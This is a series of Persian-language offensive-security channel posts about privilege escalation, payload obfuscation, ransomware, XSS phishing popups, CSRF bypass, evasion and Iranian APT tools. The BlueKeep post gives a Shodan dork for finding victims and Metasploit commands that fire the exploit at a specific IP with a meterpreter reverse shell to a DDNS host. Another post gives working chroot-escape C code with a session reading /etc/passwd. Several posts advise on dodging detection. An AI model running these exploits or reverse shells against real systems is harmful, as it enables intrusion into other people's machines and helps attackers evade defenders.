#Local #Privilege_Escalation
در تصویر پست تمام سناریو ها و روش هایی که در خصوص بالا بردن سطح دسترسی در دو سیستم عامل معروف یعنی ویندوز و لینوکس رو مشاهده میکنید,

گفتنیست یکی از ساده ترین روش ها که در بسیاری از مواقع جواب گویی هکر بوده در سیستم عامل ویندوز تکنیک Process Injection هستش که به واسطه اون یک CreateRemoteThread ساخته شده و از مجوز های پروسس دیگران استفاده میکند,

اما در لینوکس هم تکنیک File Permissions هم میتواند در اکثر مواقع مورد خوبی باشد, تا هکر با استفاده از یک فایل دارای دسترسی بالا خود را به خط فرمان رسانده و بر بستر آن شلکد اجرا کند...

https://attack.mitre.org/tactics/TA0004/
@Unk9vvN

#Obfuscation #Shellcode on Exploit
نمونه ای از روش های مبهم سازی پایلود پاورشلی بر بستر یک آسیب پذیری که بر روی زبان جاوا اسکریپت طراحی شده است,

نکته این تصویر این است که درک کردن آسیب پذیری ها و اکسپلویت نویسی برای آنها فقط لازمه یک نفوذ موفق نیست بلکه در خصوص تکنیک های #RedTeam ها هم میبایست یک هکر آگاه باشه تا بتونه Detection ها Logger ها و دیگر مکانیزم های نظارتی رو به اشتباه محاسباتی دچار کنه...

البته مدل های ٍمبهم سازی میتونه بر بستر زبان اسمبلی هم باشه مانند استفاده از الگوریتم های پالیمورفیسم, متامورفیسم , میمیمورفیسم و غیره.....

https://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-sean_taylor-binary_obfuscation.pdf
@Unk9vvN

#BadRabbit #Execution Flow
در این تصویر سناریو اجرایی یک باج افزار رو مشاهده میکنید, نکاتی جالب در خصوص چرخه اجرای باج افزار به چشم میخورد,

برای مثال هکر از تکنیک Drive By Download برای Stage اول خودش, که یک Dropper است که به همین واسطه سرویسی ساخته و بعد از پروسه انجام Privilege, دایرکتوری های مربوطه رو Encrypt شده و بدین ترتیب سرویس مربوطه کنسول DECRYPT رو ساخته و منتظر پرداخت Bitcoin میشود, و درایور decrypt رو از طریقه سرویس SMB انجام خواهد داد,

البته شرکت EndGame در این وبلاگ خودش بیشتر در خصوص پلتفرم خودش توضیح داده که چطور مقابله میکنه با این سبک از باج افزارها...

https://www.endgame.com/blog/technical-blog/falling-trap-how-endgame-platform-stops-badrabbit
@Unk9vvN

#BlueKeep RDP
به تازگی اکسپلویت BlueKeep به زبان Ruby ترجمه و در Exploit-DB قرار گرفته که ما نحوه Import اون در Metasploit و اجرا کردنش بر روی قربانیان خارجی آسیب پذیر رو به نمایش میگزاریم, ورژن های آسیب پذیر سیستم عامل ویندوز هم به شرح زیر است,

Windows 7 SP1 / 2008 R2 (6.1.7601 x64)

# Shodan Dork
https://www.shodan.io/search?query=port%3A%223389%22+os%3A%22Windows+7+or+8%22

# Import Exploit
root@unk9vvn:~# mkdir /usr/share/metasploit-framework/modules/exploits/windows/rdp;chmod 755 /usr/share/metasploit-framework/modules/exploits/windows/rdp;wget https://www.exploit-db.com/raw/47416 -O /usr/share/metasploit-framework/modules/exploits/windows/rdp/bluekeep.rb;chmod 755 /usr/share/metasploit-framework/modules/exploits/windows/rdp/bluekeep.rb

# Execute Exploit
root@unk9vvn:~# msfconsole -qx "reload_all;use windows/rdp/bluekeep;set PAYLOAD windows/x64/meterpreter/reverse_tcp;set LHOST example.ddns.net;set LPORT 4141;set RHOSTS 139.9.75.181;set EnableContextEncoding true;run -j"

@Unk9vvN

#Deserialization #RCE
توابع Serialize در زبان هایی مانند PHP و JAVA و غیره از سال 2017 به اینور بستری برای رخداد حملات Code Execution در سمت Server شدند, و این مدل از آسیب پذیری ها همچنان پتانسیل بسیار بالایی در رخداد حملات سطح بالا رو دارا هستند,

در نتیجه در پلتفرم هایی که نیاز به انتقال مثلا یک ساختار به دیتابیس هستند, یا نیاز داریم تا در API تعریف شده یک برنامه, Object رو انتقال بدیم از توابع Serialize و Unserialize استفاده میکنیم, اما آیا هکرها قادر به تزریق مثلا یک کد به پارامتر های ساختارهای Serialize شده هستند؟ سابقه این نوع حملات نشون داده بله هستند...

https://www.ambionics.io/blog/drupal8-rce
https://www.exploit-db.com/exploits/46510
@Unk9vvN

#XSS_Payload #Advanced
بحث پایلودهای پیشرفته در آسیب پذیری Cross Site Scripting میتوان گفت یکی از اساسی ترین و مهمترین مبحث این آسیب پذیری هستش, چرا که در خصوص شناسایی و Research آسیب پذیری یک روال معمولی همیشه برقرار است اما در موضوع Payload Advanced ها اینطور نیست و بسیار سناریو های گوناگونی میتوان پیاده کرد,

تیم unk9vvn یک پروژه با نام #BeEFer رو از یکی دو ماه قبل آغاز نمود که تمرکزش بر روی همین موضوع Payload Advanced ها هستش, و سناریو های بسیاری درون این محصول نوشته شده, نمونه این سناریو ها بحث Popup Phishing است که در تصویر مشاهده میکند,

این Popup احراز هویت شبکه اینستاگرام بصورت هوشمند بوده و اگر قربانی رمز صحیح وارد نکند باز برای آن تکرار خواهد شد, البته این تصویر برای مثال بوده و نیت نشان دادن اهمیت تکنیک های Payload Advanced هستش...

https://github.com/s0md3v/AwesomeXSS
@Unk9vvN

#Privilege Linux
یکی از راهکار ها استفاده از توابع سیستمی مانند chroot هستش تا به واسطه اون یک دایرکتوری رو پرمیشن داده و به واسطه همین پرمیشن تابه execl رو در return تابع main برگشت داده و خط فرمان /bin/sh رو با پرمیشن بالا اجرا و فایل های حساس سرور رو read کنیم, یک نکته دیگه برای انتقال فایل از پروتکل ssh استفاده میکنیم,

root@unk9vvn:~# nano escape.c
# Added

#include <sys/stat.h>
#include <unistd.h>
#include <fcntl.h>

int main() {
int dir_fd, x;
setuid(0);
mkdir(".42", 0755);
dir_fd = open(".", O_RDONLY);
chroot(".42");
fchdir(dir_fd);
close(dir_fd);
for(x = 0; x < 1000; x++) chdir("..");
chroot(".");
return execl("/bin/sh", "-i", NULL);
}

# Ctrl+x -> y -> Enter
root@unk9vvn:~# gcc escape.c -o escape;ssh user@192.168.131.170 "cat> escape" < escape
user@192.168.131.170's password: <PASS>

root@unk9vvn:~# ssh user@192.168.131.170
user@192.168.131.170's password: <PASS>

user@zeus:~$ ./escape
$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash

@Unk9vvN

#Exploitation #Cheatsheet
در بحث تکنیک های طراحی Exploit, یک منظومه ای از دانش ها مورد نیاز است, که ملکه ذهن شخص باشد, در نتیجه درک رابطه بین زبان ها از سطوح بالا تا پایین بسیار الزامیست, چرا که رخداد آسیب پذیری بر بستر زبان های سطح بالاتر از زبان ماشین مانند C/C++ رخ میدهد اما ردیابی آسیب پذیری و طراحی تکنیک های Bypass بر بستر لایه زیرین یعنی Assembly طراحی میشود, در نتیجه پروسه ذکر شده بسیار مورد نیاز است...

همچنین زبان های Interpreter هم نقش کلیدی در بحث طراحی اکسپلویت ایفای نقش میکنند چرا که مثلا اگر بر بستر فایل فرمت SWF قرار بر اکسپلویت نویسی باشد طبیعا میبایست بر بستر ActionScript باشد, همچنین طراحی اکسپلویت برای مرورگرها که اون هم بر بستر JavaScript و VBScript خواهد بود, پس پروسه طراحی اکسپلویت صرفاء به باگ گیری بر بستر زبان هایی مانند C/C++ نخواهد بود...

https://github.com/FabioBaroni/awesome-exploit-development
@Unk9vvN

#URLs Anchor Text Spoofing
اخیرا فردی با استفاده از Unicode Character منحصر به فرد Right to Left Override که با عدد U+202E شناخته میشه تونسته بر بستر برخی سایت های معروف مانند فیسبوک و جیمیل , اینستاگرام و واتس اپ این تکنیک رو پیاده سازی کنه,

یک نکته ای که میبایست بگم اینه که این URL Spoofing بر بستر Location صفحه نبوده و در URL که هکر بصورت Link در پستی منتشر میکنه رخ میده, اگر به تصویر پست نگاه کنید هکر در تگ a و پارامتر href با استفاده از 
 که معادل html اینکد کاراکتر RTLO هست استفاده کرده و به واسطه همین استفاده پارامتر های آخری که استفاده کرده در لینک خودش به عنوان URL اصلی لحاظ و دیده شده...

تکنیک جالبی هستش که در برخی جاها موجب بایپس مکانیزم های دفاع هم میشه...

https://blog.rakeshmane.com/2017/11/urls-anchor-text-spoofing.html
@Unk9vvN

#Double_Submit_Cookie Bypass
مکانیزم Double Submit Cookie گزینه ای برای جلوگیری از حملات CSRF در شرایط مهندسی اجتماعی است, حالا اگر ما بخوایم رمز Nonc یا در برخی فریمورک ها همان فیلد توکن رو دور بزنیم مبایست یک Request با محتوای Null بزنید و در Response مقدار nonc یا Token رو دریافت میکنیم و در Rquest دوم همان مقدار رو لحاظ کرده و به نام پارامتری که تگ hidden قرار داره مقدار دهی کرده و Request رو ارسال میکنیم, به این صورت مکانیزم Double Submit Cookie دور زده خواهد شد.

https://www.owasp.org/images/3/32/David_Johansson-Double_Defeat_of_Double-Submit_Cookie.pdf
@Unk9vvN

#Active_Directory PenTesting
در جریان عملیات های #RedTeam میتوان به تست آسیب پذیری های سرویس AD اشاره کرد, اما روش های متعددی در خصوص تست نفوذ برای آن وجود داره, که من در این پست به یکی از مناسب ترین آنها اشاره خواهم کرد,

در جریان Implementation در پروژه های #AD هکر به نامی که نویسنده Tools هایی مانند Mitmf بوده, یک اسکریپت طراحی کرده که با C&C معروف Empire ادغام شده و یک Recon بسیار خوبی رو بصورت اتوماتیک انجام خواهد داد.

https://github.com/byt3bl33d3r/DeathStar
@Unk9vvN

#VBScript for File Transfer
یکی از چالش های همیشگی هکرهای #RedTeam انجام عملیات Transfer File بر روی سیستم قربانی هستش, حالا یک اسکریپت به زبان VBScript رو میبینیم در VisualCode که البته این اسکریپت , بر روی یک فایل BAT هستش که با اجرا شدن اون یا اجرای دستورات بصورت مستفیم در cmd میتونیم اسکریپت VBS خودمون رو بسیازیم در Directory مربوطه , و بعد از اون با استفاده از مفسر فایل فرمت VBS یعنی cscript دستور دانلود فایل رو از وبسرور هکر بدیم,

این کار در خط فرمان cmd در تصویر انجام شده و فایل با موفقیت Transfer شده, یک نکته بگم اینجا برای دور زدن مکانیزم های Detection نباید فایل فرمت های PE رو Transfer کرد چرا که Detect شدن اونها بسیار درصد بالایی داره اینجا از shellcode هایی میبایست استفاده کرد که بصورت MultiStage میان و پایلود اصلی رو بصورت ENC شده Transfer میکنند,

اما خب تا همین جای کار که ما بتونیم یک Transfer بر بستر زبان های Interpreter مانند VBS داشته باشیم, خودش گزینه خوبی برای فرار از Detection ها هستش, با این روش میشه دسترسی های Shell رو به سطح دسترسی Meterpreter برد.

@Unk9vvN

#Race_Condition WebApp_Example
یک نمونه آسیب پذیری Race_Condition رو در تصویر میبینید که بر مبنای آپلود یک فایل با فرمت های تصویری هستش در پردازش Mime که از طرف کاربر ارسال میشود,

نکته قابل توجه اینجاست که در صفحه Sublime سمت راست تابع مربوط به جا به جایی فایل آپلودی , در بلاک اول شرط mime تعریف شده, این بدین معنی میتونه باشه که مهاجم با اصرار زیاد میتونه شرایط RaceCondition یا مسابقه شرط ها برای عبور از یکدیگر پیاده سازی بشه و اگر در Try های پشت سر هم به واسطه مثلا Burpsuite امکان Write ناخواسته در حافظه پیش بیاد, تابع به اشتباه فایل فرمت دیگه ای رو که مهاجم تغییر mime به multipart/form-data داده و یک پایلود php به Content تزریق کرده رو آپلود خواهد کرد و شرط اول Bypass خواهد شد,

در تصویر سمت چپ کد پچ شده ی این آسیب پذیری رو مشاهده میکنید که این بار نه تنها mime بلکه Extention فایل هم چک خواهد شد و به دلیل وجود دو شرط متوالی دیگه شرایط پیاده سازی RC وجود نخواد داشت.

@Unk9vvN

#MITRE ATT&CK
یک اسکریپت PowerShell در خصوص ارتباط با API فریمورک MITRE ATT&CK وجود دارد که میتواند تمام تکنیک ها و روش هایی که در خصوص مراحل نفوذ و پسا نفوذ را برای هکرهای #Offensive نمایان سازد اسکریپت PowerShell مذکور با API JsonBase آدرس زیر ارتباط میگیره

https://raw.githubusercontent.com/mitre/cti/master/enterprise-attack/enterprise-attack.json

دقت داشته باشید که این اسکریپت تکنیک هارو برای شما انجام نمیده بلکه تکنیک های روز رو برای شما تشریح و اگر Blog برای آنها وجود داشته باشه لینک میکنه که بتونید اطلاعات از اون تکنیک کسب کنید.

https://github.com/Cyb3rWard0g/Invoke-ATTACKAPI
@Unk9vvN

#Threat #Detection Solutions
چندی پیش با مدیر عامل شرکت امن پردازان کویر #APK جلسه ای داشتم, منباب همکاری که در نهایت توافقات مدنظر شکل نگرفت و موضوع کنسل شد,

موضوع مورد بحث این بود که ما نظر بر تولید محصول #Detection_Offensive داشتیم که بشه براش #Rule هایی نوشت و بصورت متن باز Signature سازی کرد از تحلیل ها و رصدهایی که خود محصول یا نیروی انسانی انجام میده,

این عزیزان فکر میکردن ما داریم حرف های قشنگ قشنگ میزنیم که بگیم خیلی خوبیم:) , تصویری که در پست میبینید دقیقا همین محصولی هست که ما بصورت تجربی به ایدش رسیده بودیم که میبینید Stage های ایرانی رو هم شناسایی کرده و #Rule اون هم نصب شده برای Solution به نام #THOR که یک #APT_SCANNER هستش,

در هر صورت یکی از استانداردهای اصلی مرکز کنترل امنیت اینه که محصول طراحی شده برای شرکت پای قرارداد باشه نه محصولاتی مثل SIEM->Splunk و غیره که بومی نیستند, مورد بعدی همین محصولات هم کفایت بحث #Detect یا #Hunting حملات نخواهد بود.

https://valhalla.nextron-systems.com/
@Unk9vvN

#RedTeam Tools
علوم سایبری همواره در حال گذار از مباحث روز بوده و مطالب جدیدتر و مباحث و استانداردهای جدیدتری رو سازمان دهی میکند, یکی از این استانداردها تسلط بر تکنیک های دوازده گانه شرکت MITRE ATT&CK هستش که به تازگی سازماندهی شده,

ما در این سطح از فضای تکنیکال و عملیات های PenetrationTesting خلاء هایی در کشور داریم که البته جز تیم های وصل به ارگان های نظامی مانند OilRig دیگر تیم های مردم نهاد و دانشجویی نگرش چندانی در این فضا نداشتند,

از این رو پیشنهاد میکنم که سابقه یک تیم ایرانی منتسب به سازمان های نظامی ایران رو بررسی کنید تا از کم و کیف تکنیک های استفاده شده و همینطور Tools های بکار رفته شده در حملات APTs مطلع شوید و کمی در امر حملات RealWorld نگاه دقیقتری داشته باشید,

تصویر پست یکی از همین Tools هایی است که توسط تیم OilRig و پنتسترهای RedTeam استفاده میشه.

https://attack.mitre.org/groups/G0049/
@Unk9vvN

#Securitylab #Github
آیا با SecurityLab آشنایی دارید؟ میتوانید آسیب پذیری های Publish شده در Github رو در اینجا بصورت جامع داشته و توضیحات محققین و کاشف آسیب پذیری هارو هم ببینید, همچنین میتواند آسیب پذیری هارا با Syntax CodeQL که مخصوص محققین امنیتی طراحی شده گزارش کنید...

https://securitylab.github.com/research
@Unk9vvN

#OS_Binraries ( Windows & Linux )
آیا علاقمند هستید تا Executer های سیستم عامل های لینوکس و ویندوز رو بشناسید؟

و راه حل های خلاقانه در خصوص چگونگی پیاده سازی پیلودها بر بستر نوع API یا ساختار رفتاری آنها طراحی کنید تا با استفاده از این روش بسیاری از مکانیزم های Detection رو دور زده و یک اجرای shell بصورت Evasion رو شاهد باشید,

البته ناگفته نمونه که این منبع میتونه در خصوص نوشتن برخی Post Explotation های کار آمد هم مؤثر عمل کنه...

#Windows
https://lolbas-project.github.io

#Linux
https://gtfobins.github.io

@Unk9vvN

#MuddyWater_Pivot
در یکی از گزارشات کمپانی clearskysec در خصوص بدافزار Embed شده به فایل فرمت خانواده محصولات Office یعنی Doc آمده که تیم ایرانی برای رد گم کنی یک دامنه اسرائلی رو هک کرده و Reverse دسترسی بدافزار ارسالی خودش رو به واسطه پروکسی های پی در پی به این دامنه ارسال کرده,

حرکت جالب و به ظاهر خلاقانه ای هستش اما مثل اینکه زیاد هم کار آمد نبوده و این شرکت توانسته بدافزار رو Detect و Signature کنه , البته چون هدف کشورهای عربی بوده بحث شناسایی این حمله با تاخیر انجام شده,

نوع پایلود اصلی که میشه Stage Two هم یک Macro به زبان VBScript بوده که البته بصورت مبهم سازی نوشته شده بوده و پایلود رو بر بستر خط فرمان Powershell به اجرا در می آورده, این گزارش برای سال 2018 هستش...

https://www.clearskysec.com/muddywater-operations-in-lebanon-and-oman/
@Unk9vvN